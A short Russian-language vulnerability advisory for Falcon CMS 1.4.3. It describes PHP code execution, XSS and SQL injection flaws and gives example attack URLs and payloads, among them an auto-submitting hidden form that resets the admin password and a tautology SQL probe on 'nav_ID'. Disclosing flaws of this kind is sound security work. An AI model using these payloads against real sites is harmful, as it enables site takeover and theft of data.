Программа: Falcon CMS 1.4.3

Уязвимость позволяет удаленному пользователю произвести XSS нападение и
выполнить произвольный PHP сценарий на целевой системе.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «dir[classes]» сценарием sitemap.xml.php и в параметре «error»
сценарием errors.php. Удаленный пользователь может выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]
http://[site]/errors.php?error=[Evil_Code]

2) Уязвимость существует из-за недостаточной обработки входных данных
сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.

Пример:

http://[site]/index.php?guestbook=v in the input gb_mail, gb_name and
textarea gb_text your [Xss] and after the xss work here index.php?guestbook=v :p

<form name="form_change" action="http://[site]/index.php?admin=changepass"
method="post">
<input type="hidden" name="f_pass" class="field" value="[YourPWD]" />
<input type="hidden" name="f_pass2" class="field" value="[YourPWD]" />
</form><script>document.form_change.submit()</script>

3) Уязвимость существует из-за недостаточной обработки входных данных
сценариями index.php и feed.php. Атакующий может выполнить произвольный сценарий
в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

index.php?handler=>"><script>alert(3)</script>&nav_ID=1
modules/feed/feed.php?type=rss&lang=1&topic=>"><script>alert(2)</script>

4) Уязвимость существует из-за недостаточной обработки входных данных в
параметре «nav_ID» сценарием index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Пример:

index.php?handler=cat&nav_ID=1'%20and%20'1'='1

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии